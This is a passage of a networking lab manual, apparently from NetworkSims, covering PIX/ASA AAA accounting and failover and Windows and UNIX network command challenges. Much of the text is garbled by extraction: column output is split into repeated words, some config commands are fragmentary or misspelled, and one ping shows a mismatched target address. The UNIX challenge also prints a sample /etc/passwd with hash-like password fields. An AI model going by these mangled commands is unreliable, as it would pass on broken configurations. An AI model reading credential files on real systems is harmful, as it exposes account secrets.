The PIX/ASA can setup accounting on connections. To define the traffic for the accounting:
(config)#
(config)#
(config)#
(config)#
(config)#
aaa
aaa
aaa
aaa
aaa
accounting
accounting
accounting
accounting
accounting
include
include
include
include
include

which will accounts for all Telnet, SSH, Ftp, Http and Https accesses on the inside interface,
for all source and destination addresses (where 0 is the same as 0.0.0.0). In this case
SERVERTAG is the tag that defines the accounting, such as:
Objectives
Define accounting traffic.

Commands
(config)# int e0
(config-if)# exit
(config)# aaa accounting include telnet outside 0 0 0 0 SERVERTAG
NetworkSims.com
710
(config)#
(config)#
(config)#
(config)#
aaa
aaa
aaa
aaa
accounting
accounting
accounting
accounting
include
include
include
include

Example
(config)# int e0
(config-if)# exit
(config)# aaa accounting include telnet outside 0 0 0 0 SERVERTAG
(config)# aaa accounting include ssh outside 0 0 0 0 SERVERTAG
(config)# aaa accounting include ftp outside 0 0 0 0 SERVERTAG
(config)# aaa accounting include http outside 0 0 0 0 SERVERTAG
(config)# aaa accounting include https outside 0 0 0 0 SERVERTAG

Outline
This challenge involves taking a PIX/ASA test on local users and AAA. The main facts are:
Cisco IOS has 16 different privilege levels, 0 to 15.

Level 15 is the highest privilege and 0 is the lowest.
show privilege is used to display the current privilege level.
Privileged EXEC mode is Level 15.
EXEC mode mode is Level 1.
Key commands
Local authentication:
(config)# aaa authentication serial console MYLOCAL
(config)# aaa authentication telnet console MYLOCAL
(config)# aaa authentication ssh console MYLOCAL
(config)# aaa authentication http console MYLOCAL
RADIUS authentication:
(config)# aaa-server TEST protocol radius
(config)# aaa-server TEST (inside) host 1.2.3.4
NetworkSims.com
711
Tacacs+ authentication:
(config)# aaa-server TEST (inside) host 1.2.3.4
End-User Cut-Through Proxy:

(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
aaa authentication include telnet outside 0 0 0 0 SERVERTAG

aaa authentication include ssh outside 0 0 0 0 SERVERTAG
aaa authentication include ftp outside 0 0 0 0 SERVERTAG
aaa authentication include http outside 0 0 0 0 SERVERTAG
aaa authentication include https outside 0 0 0 0 SERVERTAG
aaa-server SERVERTAG (inside) host 1.2.3.4
Where 0 identifies 0.0.0.0.

End-User Cut-Through Proxy with ACL:
(config)#
(config)#
(config)#
(config)#
(config)#
access-list TEST permit 192.168.0.0 255.255.255.0

access-list TEST permit tcp any any eq ftp
access-list TEST permit tcp any any eq http
aaa authenication match TEST inside SERVERTAG
aaa-server SERVERTAG (inside) host 1.2.3.4
End-User Cut-Through Proxy with ACL and exempting some devices:

Define a limit to per-user proxy connections

Define an inactivity time


Title: Stateful Failover (Cable-based Active/Standby Failover)
Outline
The PIX 500 supports cable-based failover (stateful failover). With stateful failover the
secondary device keeps a track of all the states of the primary firewall, and thus the
secondary can seemlessly takes over from the primary.
NetworkSims.com
712
Initially the failover cable connects between the PIX devices (primary and secondary). The
cable end marked "Primary" is connected to the primary unit, and the other end to the
secondary unit.
The IP address of an interface and its standby address can be defined with:
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0 standby 192.168.0.2
(config)# int e1
Next the stateful failover is configured on the Stateful Failover link, such as:
(config)# failover link inf2 e2
in this case inf2 is the name of the physical interface (e2). This will be used for the failover
link. Next an IP address and failover address for the Stateful Failover link can be assigned:
(config)# int e2
(config)# failover interface ip inf2 192.168.2.1 255.255.255.0 standby 192.168.2.2
And then to enable failover:

(config)# failover
Objectives
Enable failover.
Commands
(config)# int e0
(config-if)# exit
(config)# int e1
(config-if)# exit
(config)# int e2
(config-if)# exit
(config)# failover
NetworkSims.com
713
Example
(config)# int e0
(config-if)# exit
(config)# int e1
(config-if)# exit
(config)# int e2
(config-if)# exit
(config)# failover

Outline
This challenge involves taking a PIX/ASA test on failover.
Key commands
Stateful Failover (Cable-based Active/Standby Failover)
(config)# int e0
(config-if)# exit
(config)# int e1
(config-if)# exit
(config)# int e2
(config-if)# exit
(config)# failover
Where E2 is used as the failover link, and the standby addresses for E0 and E1 are
192.168.0.2 and 192.168.1.2, respectively.
NetworkSims.com
714
15 Windows/UNIX host
Windows Challenge 1
Outline
This challenge involves the configuration of network properties for Windows.
Objectives
Set the IP address.

Set the subnet mask.
Set the gateway.
Set the DNS server.
Example
> ping 192.168.0.1
NetworkSims.com
715
Pinging 192.168.0.10 with 32 bytes of data:

Request
Request
Request
Request
timed
timed
timed
timed
out.
out.
out.
out.
Ping statistics for 192.168.0.10:

Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
setup Windows interface
> ping 192.168.0.1
Reply
Reply
Reply
Reply
from
from
from
from
192.168.0.1:
192.168.0.1:
192.168.0.1:
192.168.0.1:
bytes=32
bytes=32
bytes=32
bytes=32
time=3ms
time=1ms
time=1ms
time=1ms
TTL=64
TTL=64
TTL=64
TTL=64

Approximate round trip times in milli-seconds:
Minimum = 1ms, Maximum = 3ms, Average = 1ms
> ipconfig
Windows IP Configuration
Ethernet adapter Wireless Network Connection 4:
Connection-specific
IP Address. . . . .
Subnet Mask . . . .
Default Gateway . .
DNS
. .
. .
. .
Suffix
. . . .
. . . .
. . . .
.
.
.
.
:
: 192.168.0.3
: 255.255.255.0
: 192.168.0.1
Ethernet adapter Local Area Connection:

Media State . . . . . . . . . . . : Media disconnected
> ipconfig /all
Host Name . . . . .
Primary Dns Suffix
Node Type . . . . .
IP Routing Enabled.
WINS Proxy Enabled.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
:
:
:
:
:
freds
Peer-Peer
No
No

Connection-specific DNS Suffix
Description . . . . . . . . . .
Physical Address. . . . . . . .
Dhcp Enabled. . . . . . . . . .
Autoconfiguration Enabled . . .
IP Address. . . . . . . . . . .
Subnet Mask . . . . . . . . . .
Default Gateway . . . . . . . .
DHCP Server . . . . . . . . . .
NetworkSims.com
.
.
.
.
.
.
.
.
.
:
:
:
:
:
:
:
:
:
Intel(R) PRO/Wireless 2200BG Net

00-35-00-54-02-20
Yes
Yes
192.168.0.3
255.255.255.0
192.168.0.1
192.168.0.1
716
DNS Servers . . . . . . . . . . . : 192.168.0.1

Lease Obtained. . . . . . . . . . : 14 October 2007 19:29:50
Lease Expires . . . . . . . . . . : 17 October 2007 19:29:50
>tracert 192.168.0.3
Tracing route to bills [192.168.0.3]
over a maximum of 30 hops:
1
<1 ms
<1 ms
<1 ms
bills [192.168.0.3]
Trace complete.
>tracert 192.168.0.20
Tracing route to 192.168.0.20 over a maximum of 30 hops
1
Request timed out.
Windows Challenge 2
Outline
Objectives
Use NSLOOKUP.
Show the ARP cache.
Show the Windows version.
Use IPCONFIG to show details.
Example
Press return to boot!
Booting PC...in Windows XP
>
Use:
VER
IPCONFIG
IPCONFIG /ALL
NSLOOKUP
ARP -a
ARP
NET
TRACERT
or PING
> nslookup www.intel.com
Name: www.intel.com
Address: 84.53.136.24
NetworkSims.com
717
> arp -a
Interface: 192.168.0.3 --- 0x2
Internet Address
Physical Address
192.168.0.1
00-38-4d-10-d6-43
Type
dynamic
C:\> ver
Microsoft Windows XP [Version 5.1.2600]
> ipconfig
Connection-specific
IP Address. . . . .
Subnet Mask . . . .
Default Gateway . .
DNS
. .
. .
. .
Suffix
. . . .
. . . .
. . . .
.
.
.
.
:
: 192.168.0.3
: 255.255.255.0
: 192.168.0.1
Ethernet adapter Local Area Connection:

Media State . . . . . . . . . . . : Media disconnected
> ipconfig /all
Host Name . . . . .
Primary Dns Suffix
Node Type . . . . .
IP Routing Enabled.
WINS Proxy Enabled.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
:
:
:
:
:
freds
Peer-Peer
No
No

Connection-specific DNS Suffix
Description . . . . . . . . . .
Physical Address. . . . . . . .
Dhcp Enabled. . . . . . . . . .
Autoconfiguration Enabled . . .
IP Address. . . . . . . . . . .
Subnet Mask . . . . . . . . . .
Default Gateway . . . . . . . .
DHCP Server . . . . . . . . . .
DNS Servers . . . . . . . . . .
Lease Obtained. . . . . . . . .
Lease Expires . . . . . . . . .
.
.
.
.
.
.
.
.
.
.
.
.
:
:
:
:
:
:
:
:
:
:
:
:
Intel(R) PRO/Wireless 2200BG Net

00-35-00-54-02-20
Yes
Yes
192.168.0.3
255.255.255.0
192.168.0.1
192.168.0.1
192.168.0.1
14 October 2007 19:29:50
17 October 2007 19:29:50
Windows Challenge 3
Outline
NetworkSims.com
718
Objectives
Use netstat.
Use assoc.
Use chkdsk.
Example
C:\> netstat /?
Displays protocol statistics and current TCP/IP network connections.
NETSTAT [-a] [-b] [-e] [-n] [-o] [-p proto] [-r] [-s] [-v] [interval]
-a
-b
-e
-n
-o
-p proto
-r
-s
-v
interval
Displays all connections and listening ports.

Displays the executable involved in creating each connection or
listening port. In some cases well-known executables host
multiple independent components, and in these cases the
sequence of components involved in creating the connection
or listening port is displayed. In this case the executable
name is in [] at the bottom, on top is the component it called,
and so forth until TCP/IP was reached. Note that this option
can be time-consuming and will fail unless you have sufficient
permissions.
Displays Ethernet statistics. This may be combined with the -s
option.
Displays addresses and port numbers in numerical form.
Displays the owning process ID associated with each connection.
Shows connections for the protocol specified by proto; proto
may be any of: TCP, UDP, TCPv6, or UDPv6. If used with the -s
option to display per-protocol statistics, proto may be any of:
IP, IPv6, ICMP, ICMPv6, TCP, TCPv6, UDP, or UDPv6.
Displays the routing table.
Displays per-protocol statistics. By default, statistics are
shown for IP, IPv6, ICMP, ICMPv6, TCP, TCPv6, UDP, and UDPv6;
the -p option may be used to specify a subset of the default.
When used in conjunction with -b, will display sequence of
components involved in creating the connection or listening
port for all executables.
Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.
C:\> netstat -a
Active Connections
Proto
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
Local Address
freds:smtp
freds:http
freds:epmap
freds:https
freds:microsoft-ds
freds:1026
freds:2393
freds:2394
NetworkSims.com
Foreign Address
freds:0
freds:0
freds:0
freds:0
freds:0
freds:0
freds:0
freds:0
State
LISTENING
LISTENING
LISTENING
LISTENING
LISTENING
LISTENING
LISTENING
LISTENING
719
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
freds:2725
freds:3389
freds:8674
freds:8679
freds:8680
freds:8681
freds:8898
freds:8899
freds:8901
freds:8902
freds:62514
freds:62514
freds:62514
freds:62516
freds:62516
freds:62516
freds:netbios-ssn
freds:9106
freds:9111
freds:netbios-ssn
freds:snmp
freds:microsoft-ds
freds:isakmp
freds:983
freds:1276
freds:1775
freds:2325
freds:2326
freds:3456
freds:4500
freds:9109
freds:ntp
freds:1900
freds:2126
freds:62514
freds:ntp
freds:netbios-ns
freds:netbios-dgm
freds:1900
freds:ntp
freds:netbios-ns
freds:netbios-dgm
freds:1900
freds:0
LISTENING
freds:0
LISTENING
localhost:62514
ESTABLISHED
localhost:62514
ESTABLISHED
localhost:62516
ESTABLISHED
localhost:62516
ESTABLISHED
localhost:8899
ESTABLISHED
localhost:8898
ESTABLISHED
localhost:8902
ESTABLISHED
localhost:8901
ESTABLISHED
freds:0
LISTENING
localhost:8674
ESTABLISHED
localhost:8679
ESTABLISHED
freds:0
LISTENING
localhost:8680
ESTABLISHED
localhost:8681
ESTABLISHED
freds:0
LISTENING
s.nowhere.ac.uk:1026 ESTABLISHED
mail.nowhere.ac.uk:1402 ESTABLIS
freds:0
LISTENING
*:*
*:*
*:*
*:*
*:*
*:*
*:*
*:*
*:*
*:*
*:*
*:*
*:*
*:*
*:*
*:*
*:*
*:*
*:*
*:*
*:*
*:*
*:*
C:\> netstat -b
Active Connections
Proto Local Address
TCP
freds:8674
[vpngui.exe]
Foreign Address
localhost:62514
State
ESTABLISHED
PID
3660
TCP
freds:8679
[ipseclog.exe]
localhost:62514
ESTABLISHED
976
TCP
freds:8680
[cvpnd.exe]
localhost:62516
ESTABLISHED
260
TCP
freds:8681
[vpngui.exe]
localhost:62516
ESTABLISHED
3660
TCP
freds:8898
[firefox.exe]
localhost:8899
ESTABLISHED
2160
NetworkSims.com
720
TCP
freds:8899
[firefox.exe]
localhost:8898
ESTABLISHED
2160
TCP
freds:8901
[firefox.exe]
localhost:8902
ESTABLISHED
2160
TCP
freds:8902
[firefox.exe]
localhost:8901
ESTABLISHED
2160
TCP
freds:62514
[cvpnd.exe]
localhost:8679
ESTABLISHED
260
TCP
freds:62514
[cvpnd.exe]
localhost:8674
ESTABLISHED
260
TCP
freds:62516
[ipseclog.exe]
localhost:8681
ESTABLISHED
976
TCP
freds:62516
[ipseclog.exe]
localhost:8680
ESTABLISHED
976
TCP
freds:9106
[OUTLOOK.EXE]
s.nowhere.ac.uk:1026
TCP
freds:9111
3648
[OUTLOOK.EXE]
mail.nowhere-mail.nowhere.ac.uk:1402
ESTABLISHED
3648
ESTABLISHED
C:\> netstat -e
Interface Statistics
Bytes
Unicast packets
Non-unicast packets
Discards
Errors
Unknown protocols
Received
Sent
88491198
164944
452
0
0
1007
45842271
153335
296
0
2
C:\> netstat -n
Active Connections
Proto
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
Local Address
127.0.0.1:8674
127.0.0.1:8679
127.0.0.1:8680
127.0.0.1:8681
127.0.0.1:8898
127.0.0.1:8899
127.0.0.1:8901
127.0.0.1:8902
127.0.0.1:62514
127.0.0.1:62514
127.0.0.1:62516
127.0.0.1:62516
10.0.212.177:9106
10.0.212.177:9111
Foreign Address
127.0.0.1:62514
127.0.0.1:62514
127.0.0.1:62516
127.0.0.1:62516
127.0.0.1:8899
127.0.0.1:8898
127.0.0.1:8902
127.0.0.1:8901
127.0.0.1:8674
127.0.0.1:8679
127.0.0.1:8680
127.0.0.1:8681
10.0.8.10:1026
10.0.222.7:1402
State
ESTABLISHED
ESTABLISHED
ESTABLISHED
ESTABLISHED
ESTABLISHED
ESTABLISHED
ESTABLISHED
ESTABLISHED
ESTABLISHED
ESTABLISHED
ESTABLISHED
ESTABLISHED
ESTABLISHED
ESTABLISHED
C:\> netstat -r
NetworkSims.com
721
Route Table
===========================================================================
Interface List
0x1 ........................... MS TCP Loopback interface
0x2 ...00 15 00 34 02 f0 ...... Intel(R) PRO/Wireless 2200BG Network Connection
- Deterministic Network Enhancer Miniport
0x3 ...00 03 0d 36 38 99 ...... Realtek RTL8169/8110 Family Gigabit Ethernet NIC
- Deterministic Network Enhancer Miniport
0x20005 ...00 05 9a 3c 78 00 ...... Cisco Systems VPN Adapter - Deterministic Ne
twork Enhancer Miniport
===========================================================================
===========================================================================
Active Routes:
Network Destination
Netmask
Gateway
Interface Metric
0.0.0.0
0.0.0.0
192.168.0.1
192.168.0.2
25
127.0.0.0
255.0.0.0
127.0.0.1
127.0.0.1
1
10.0.0.0
255.255.0.0 10.0.212.177 10.0.212.177
25
10.0.1.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.2.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.5.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.8.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.13.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.14.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.15.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.16.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.22.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.26.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.27.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.28.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.29.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.30.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.31.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.35.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.36.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.37.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.50.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.62.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.63.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.64.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.65.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.74.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.75.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.76.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.77.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.78.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.79.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.80.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.81.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.101.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.102.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.103.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.112.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.140.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.162.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.163.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.165.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.166.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.210.2 255.255.255.255
192.168.0.1
192.168.0.2
1
10.0.211.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.212.177 255.255.255.255
127.0.0.1
127.0.0.1
25
10.0.221.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.222.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.223.0
255.255.255.0 10.0.212.177 10.0.212.177
1
NetworkSims.com
722
10.0.244.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.246.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.247.0
255.255.255.0 10.0.212.177 10.0.212.177
1
10.0.255.255 255.255.255.255 10.0.212.177 10.0.212.177
25
192.168.0.0
255.255.255.0
192.168.0.2
192.168.0.2
25
192.168.0.1 255.255.255.255
192.168.0.2
192.168.0.2
1
192.168.0.2 255.255.255.255
127.0.0.1
127.0.0.1
25
192.168.0.255 255.255.255.255
192.168.0.2
192.168.0.2
25
224.0.0.0
240.0.0.0 10.0.212.177 10.0.212.177
25
224.0.0.0
240.0.0.0
192.168.0.2
192.168.0.2
25
255.255.255.255 255.255.255.255 10.0.212.177 10.0.212.177
1
255.255.255.255 255.255.255.255
192.168.0.2
3
1
255.255.255.255 255.255.255.255
192.168.0.2
192.168.0.2
1
Default Gateway:
192.168.0.1
===========================================================================
Persistent Routes:
None
C:\> netstat -s
IPv4 Statistics
Packets Received
Received Header Errors
Received Address Errors
Datagrams Forwarded
Unknown Protocols Received
Received Packets Discarded
Received Packets Delivered
Output Requests
Routing Discards
Discarded Output Packets
Output Packet No Route
Reassembly Required
Reassembly Successful
Reassembly Failures
Datagrams Successfully Fragmented
Datagrams Failing Fragmentation
Fragments Created
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
182154
0
55
0
0
514
181638
176717
0
0
0
4
2
0
0
0
0
ICMPv4 Statistics
Messages
Errors
Destination Unreachable
Time Exceeded
Parameter Problems
Source Quenches
Redirects
Echos
Echo Replies
Timestamps
Timestamp Replies
Address Masks
Address Mask Replies
Received
12902
0
5965
0
0
0
0
3
6934
0
0
0
0
Sent
12974
22
5964
0
0
0
0
6985
3
0
0
0
0
TCP Statistics for IPv4

Active Opens
Passive Opens
Failed Connection Attempts
Reset Connections
NetworkSims.com
=
=
=
=
1970
315
26
440
723
Current Connections
Segments Received
Segments Sent
Segments Retransmitted
=
=
=
=
14
150768
145270
52
UDP Statistics for IPv4

Datagrams Received
No Ports
Receive Errors
Datagrams Sent
=
=
=
=
12003
24829
1
18306
C:\> set
ALLUSERSPROFILE=C:\\Documents and Settings\\All Users.WINDOWS
APPDATA=C:\\Documents and Settings\\Fred\\Application Data
CLASSPATH=.;C:\\Program Files\\Java\\jre1.5.0\\lib\\ext\\QTJava.zip
CLIENTNAME=Console
CommonProgramFiles=C:\\Program Files\\Common Files
COMPUTERNAME=freds
ComSpec=C:\\WINDOWS\\system32\\cmd.exe
DISPLAY=localhost:0.0
EDITOR=vi
C:\> bootcfg /?
BOOTCFG /parameter [arguments]
Description:
This command line tool can be used to configure, query, change or
delete the boot entry settings in the BOOT.INI file.
Parameter List:
/Copy
Makes a copy of an existing boot entry [operating
systems] section for which you can add OS options to.
/Delete
Deletes an existing boot entry in the [operating

systems] section of the BOOT.INI file. You must specify
the entry# to delete.
/Query
Displays the current boot entries and their settings.
/Raw
Allows the user to specify any switch options to be

added for a specified boot entry.
/Timeout
Allows the user to change the Timeout value.
/Default
Allows the user to change the Default boot entry.
/EMS
Allows the user to configure the /redirect switch

for headless support for a boot entry.
/Debug
Allows the user to specify the port and baudrate for

remote debugging for a specified boot entry.
/Addsw
Allows the user to add predefined switches for

a specific boot entry.
/Rmsw
Allows the user to remove predefined switches for a

specific boot entry.
/Dbg1394
Allows the user to configure 1394 port debugging

for a specified boot entry.
NetworkSims.com
724
/?
Displays this help/usage.
Examples:
BOOTCFG
BOOTCFG
BOOTCFG
BOOTCFG
BOOTCFG
BOOTCFG
BOOTCFG
BOOTCFG
BOOTCFG
BOOTCFG
BOOTCFG
BOOTCFG
/Copy /?
/Delete /?
/Query /?
/Raw /?
/Timeout /?
/EMS /?
/Debug /?
/Addsw /?
/Rmsw /?
/Dbg1394 /?
/Default /?
/?
C:\> bootcfg
Boot Loader Settings
-------------------timeout: 30
default: multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS
Boot Entries
-----------Boot entry ID:
Friendly Name:
Path:
OS Load Options:
1
"Microsoft Windows XP Professional"
multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS
/noexecute=optin /noexecute=alwaysoff /fastdetect
C:\> diskpart
Microsoft DiskPart version 5.1.3565
Copyright (C) 1999-2003 Microsoft Corporation.
On computer: freds
C:\> assoc /?
.aac=Winamp.File
.aif=AIFFFile
.ARC=WinZip
.ARJ=WinZip
.asf=Winamp.File
UNIX Challenge 4
Outline
This challenge involves the configuration of network properties for UNIX.
Objectives
Set the IP address.

NetworkSims.com
725
Set the MTU.

Ping the Ethernet port while disabled.
Enable the port.
Ping the Ethernet port while enabled.
Example
% ifconfig eth0 192.168.0.1 netmask 255.255.255.0
% ifconfig eth0 mtu 1500
% ping 192.168.0.1
Timeout
Timeout
Timeout
Timeout
for
for
for
for
192.168.0.1
192.168.0.1
192.168.0.1
192.168.0.1

% ifconfig eth0 up
% ping 192.168.0.1
Reply
Reply
Reply
Reply
from
from
from
from
192.168.0.1
192.168.0.1
192.168.0.1
192.168.0.1
bytes=32
bytes=32
bytes=32
bytes=32
time
time
time
time
1ms
1ms
1ms
1ms
TTL=128
TTL=128
TTL=128
TTL=128

Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
% ifconfig eth0 promisc
UNIX Challenge 5
Outline
This challenge involves the configuration of network properties for UNIX.
Objectives
Set the IP address.

Set the MTU.
Enable the port.
Example
NetworkSims.com
726
% ls
% cd bin
[/bin ]% ls
[/bin ]% cd /etc
[/etc ]% ls
[/etc ]% nslookup www.intel.com
Name: www.intel.com
Address: 84.53.136.24
[/etc ]% cat hosts
138.38.32.45 bath
198.4.6.3 compuserve
193.63.76.2 niss
148.88.8.84 hensa
146.176.2.3 janet
146.176.151.51 sun
[/etc ]% cat protocols
# The form for each entry is:
# "official protocol name" "protocol number" "aliases"
# Internet (IP) protocols
ip 0 IP # internet protocol, pseudo protocol number
icmp 1 ICMP # internet control message protocol
ggp 3 GGP # gateway-gateway protocol
tcp 6 TCP # transmission control protocol
egp 8 EGP # exterior gateway protocol
pup 12 PUP # PARC universal packet protocol
udp 17 UDP # user datagram protocol
hmp 20 HMP # host monitoring protocol
xns-idp 22 XNS-IDP # Xerox NS IDP
rdp 27 RDP # "reliable datagram" protocol
[/etc ]% cat netgroups
# The format for each entry is: groupname member1 member2 ...
# (hostname, username, domainname)
engineering hardware software (host3, mikey, hp)
hardware (hardwhost1, chm, hp) (hardwhost2, dae, hp)
software (softwhost1, jad, hp) (softwhost2, dds, hp)
[/etc ]% cat passwd
root:FDEc6.32:1:0:Super user:/user:/bin/csh
fred:jt.06hLdiSDaA:2:4:Fred Blogs:/user/fred:/bin/csh
fred2:jtY067SdiSFaA:3:4:Fred Smith:/user/fred2:/bin/csh
[/etc ]% cat groups
root::0:root
other::1:root,hpdb
bin::2:root,bin
sys::3:root,uucp
freds_grp::4:fred,fred2,fred3
[/etc ]% cat mnttab
/dev/dsk/c201d6s0 / hfs defaults 0 1 850144122 1
/dev/dsk/c201d5s0 /win hfs defaults 1 2 850144127 1
castor:/win /net/castor_win nfs rw,suid 0 0 850144231 0
miranda:/win /net/miranda_win nfs rw,suid 0 0 850144291 0
spica:/usr/opt /opt nfs rw,suid 0 0 850305936 0
triton:/win /net/triton_win nfs rw,suid 0 0 850305936 0
[/etc ]% cat inetd.conf
# "service_name" "sock_type" "proto" "flags" "user" "server_path" "args"
NetworkSims.com
727
# Echo, discard and daytime are used primarily for testing.

echo stream tcp nowait root internal
echo dgram udp wait root internal
discard stream tcp nowait root internal
discard dgram udp wait root internal
daytime stream tcp nowait root internal
daytime dgram udp wait root internal
time dgram udp wait root internal
#
# These are standard services.
ftp stream tcp nowait root /usr/sbin/tcpd /usr/sbin/wu.ftpd
telnet stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.telnetd
#
# Shell, login, exec and talk are BSD protocols.
shell stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.rshd
login stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.rlogind
talk dgram udp wait root /usr/sbin/tcpd /usr/sbin/in.ntalkd
ntalk dgram udp wait root /usr/sbin/tcpd /usr/sbin/in.ntalkd
#
# Pop mail servers
pop3 stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.pop3d
#
bootps dgram udp wait root /usr/sbin/tcpd /usr/sbin/in.bootpd
#
finger stream tcp nowait daemon /usr/sbin/tcpd /usr/sbin/in.fingerd
systat stream tcp nowait guest /usr/sbin/tcpd /usr/bin/ps -auwwx
netstat stream tcp nowait guest /usr/sbin/tcpd /bin/netstat -f inet
% netstat
TCP
Local Address
Remote Address
Swind Send-Q Rwind Recv-Q State
-------------------- -------------------- ----- ------ ----- ------ ------selene.35104
mer-cluster1.napier.ac.uk.524 22516
0
8760
ESTABLISHED
selene.35145
0
8760
ESTABLISHED
selene.35248
0
8760
ESTABLISHED
selene.38513
sighthill-gpas.napier.ac.uk.524 20316
0 8760
ESTABLISHED
selene.53479
0
8760
ESTABLISHED
selene.40969
swallow.sunsite.org.uk.ftp
9660
0
9660
CLOSE_WAIT
localhost.1106
localhost.47733
32768
0 32768
0 CLOSE_WAIT
selene.58635
mer-cluster1.napier.ac.uk.524
7528
0
8760
ESTABLISHED
selene.60344
mer-cluster1.napier.ac.uk.524
7852
0
8760
ESTABLISHED
selene.50401
selene.ftp
32768
0 32768
0 CLOSE_WAIT
selene.telnet
SOC001878.4010
17389
0 8760
0 ESTABLISHED
selene.888
zeus.nfsd
8760
0 8760
0 ESTABLISHED
selene.telnet
ACBC2690.ipt.aol.com.3532 16992
1
9520
ESTABLISHED
Active UNIX domain sockets
Address Type
Vnode
Conn Local Addr
Remote Addr
30000b901a8 stream-ord 30000b2e658 00000000 /etc/.nds_uamcd_sock
30000b90d08 stream-ord 300016ad8d0 00000000 /var/.ndsso_unixsock
30000b90008 stream-ord 30001bd75c0 00000000 /var/nds/nds_identsock
30000b91388 dgram
300008bb228 00000000 /var/n4u/slpsrvsock.2550
NetworkSims.com
728
0
0
0
0
0
0
0
0
UNIX Tutorial
MOVING AROUND
Initially you will be in the top-level (/).
1 List the directory with the ls command.
What directories are available?
2 Change the current directory to /bin the cd bin command.

List some of the programs in this directory.
3 Move back to the top-level with cd .. or cd /.

4 Move into other directories using the cd command, and list their contents with ls.
The key directories are /bin (where many of the commands are stored), /etc (where many of
the configuration files are stored), /sbin (where extra networking commands are stored),
/usr (where the user files are stored) and /dev (where the device drivers are stored).
LOCATING IMPORTANT NETWORKING FILES
Search the directories and find the following files: ifconfig, dhcpinfo, inetd.conf, ls, cd,
mnttab, network, services, hosts and protocols.
CONFIGURING THE INTERFACE
The ifconfig command can be used to view the network settings on the interface card.
1 Enter the ifconfig command, and view the help page.
2 Enter the ifconfig -a command, and determine the network configuration
List the network settings.
SHOWING THE ARP CACHE
The ARP table contains the mapping of IP addresses to MAC addresses, on the local
network.
NetworkSims.com
729
1 Enter the arp command, and determine the options used with arp.
2 Enter the arp -a command, to show the current arp table
List some of the MAC addresses and IP mappings.
SHOWING PROCESSES
The ps command can be used to show currently running processes.
1 Enter the ps command, and determine the currently running processes for the user.
2 Enter the ps -al command, and all the running processes
List some of the processes.
3 Enter the ps -ef command, for a more complete list of running processes
List some of the processes.
LISTING KEY NETWORK FILES
Many of the key network configuration files are in the /etc directory.
1 Go to the /etc directory with cd etc.
2 Enter the cat hosts command, and determine its contents.
List some the contents.
